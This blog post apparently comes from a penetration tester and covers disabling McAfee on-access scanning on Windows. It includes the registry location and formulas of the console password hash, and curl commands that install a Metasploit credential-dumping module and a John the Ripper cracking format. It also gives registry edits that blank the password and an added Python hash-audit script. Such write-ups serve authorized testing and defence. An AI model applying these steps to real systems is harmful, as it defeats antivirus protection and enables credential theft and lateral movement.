
Disabling McAfee On-Access Scanning

In a recent internal penetration test I came across a situation where, although I was local administrator on a Windows server, I could not run Windows Credentials Editor (WCE) because it was detected as a malicious threat by the McAfee on-access scan, as you can see below:

The first thought was to disable it but for security reasons McAfee prevents Administrators from stopping the service:

or killing the process:

Then, I thought to stop McAfee directly but when I went to the McAfee console I noticed that it was password protected:

After Googling a bit I discovered that McAfee stores the hash of that password in a registry key. If the version of McAfee is 5.x then the password hash is in the format md5(unicode(password)), option "--format=md5u" in JTR. If the version of McAfee is 8.x then it is base64(sha1(unicode("\x01\x0f\x0d\x33"+password))). Unlike the first format, by default JTR does not come with a format option for cracking that hash (base64(sha1(unicode("\x01\x0f\x0d\x33"+password)))), so you would need to edit your john.local.conf and add a dynamic format. I have written both a Metasploit post module that grabs the hash from the registry key and the dynamic format that is necessary for cracking the hash of McAfee version 8.x.
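As an added example (not the post's module or the john.local.conf it links), the following Python implements the two UIP hash formulas above so that an administrator can check the console password on their own hosts against a short list of known-weak candidates. It assumes that "unicode(...)" means the UTF-16LE encoding Windows uses for wide strings and that the 8.x prefix is encoded together with the password, exactly as the formula is written.

```python
import base64
import hashlib

# Constant that VSE 8.x prepends to the password before hashing, as given in
# the post. Note that "\x33" is simply the ASCII character "3".
VSE8_PREFIX = "\x01\x0f\x0d\x33"

# Assumption: "unicode(...)" in the post means the UTF-16LE encoding Windows
# uses for wide strings, which is also what John's md5u format expects.
def _unicode(text):
    return text.encode("utf-16le")

def vse5_hash(password):
    """VSE 5.x UIP value: hex md5(unicode(password)), i.e. John's md5u."""
    return hashlib.md5(_unicode(password)).hexdigest()

def vse8_preimage(password):
    """The exact bytes VSE 8.x hashes: unicode(prefix + password)."""
    return _unicode(VSE8_PREFIX + password)

def vse8_hash(password):
    """VSE 8.x UIP value: base64(sha1(unicode(prefix + password)))."""
    digest = hashlib.sha1(vse8_preimage(password)).digest()
    return base64.b64encode(digest).decode("ascii")

def detect_version(uip_value):
    """Infer the scheme from the shape of the stored UIP registry value:
    32 hex chars -> 5.x (MD5); 28 base64 chars decoding to 20 bytes -> 8.x (SHA-1)."""
    value = uip_value.strip()
    if len(value) == 32 and all(c in "0123456789abcdefABCDEF" for c in value):
        return "5.x"
    if len(value) == 28:
        try:
            if len(base64.b64decode(value, validate=True)) == 20:
                return "8.x"
        except ValueError:
            pass
    return "unknown"

def audit_uip(uip_value, candidates):
    """Return the candidate password that reproduces the stored UIP value, or
    None. Meant for checking your own hosts against a list of weak passwords."""
    value = uip_value.strip()
    version = detect_version(value)
    if version == "5.x":
        return next((c for c in candidates if vse5_hash(c) == value.lower()), None)
    if version == "8.x":
        return next((c for c in candidates if vse8_hash(c) == value), None)
    return None
```

Feed audit_uip the UIP value read from the DesktopProtection registry key named later in the post and a constructed weak-password list; a non-None result means the console password should be changed.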

[22/01/2015] This module is now part of Metasploit master branch: mcafee_vse_hashdump.rb

Installation

mkdir -p ~/.msf4/modules/post/windows/gather/credentials
curl -O https://raw.githubusercontent.com/m7x/Metasploit-Modules/master/post/windows/gather/credentials/mcafee_hashdump.rb
curl https://raw.githubusercontent.com/m7x/stuff/master/john.local.conf >> your_john_path/john.local.conf

Usage

Once Meterpreter is running on the targeted machine and has enough permissions for accessing the registry key you can run the post exploitation module as shown below.

The module stores the hash in the Metasploit database which is a good place to keep all harvested credentials.

Finally, you need to load the hash in john specifying the dynamic format and hope that the password or some variants are in your dictionary.

Obtaining clear-text passwords during a penetration test is always useful, since the same passwords might have been re-used on other systems and could let you compromise them as well. However, if you have physical access to the target machine and you can reboot it (which is normally not possible during an assessment), you could boot into Safe Mode and set the following registry key to blank:

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\McAfee\DesktopProtection\UIP = ""

And set this other one to 0:

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\McAfee\DesktopProtection\UIPMode = "0"

This would let you open the McAfee console without requiring a password.

Troubleshooting

If John returns the following error message when you are trying to crack the hash, use the option "-enc:8859-1":
This format does not yet support other encodings than ISO-8859-1
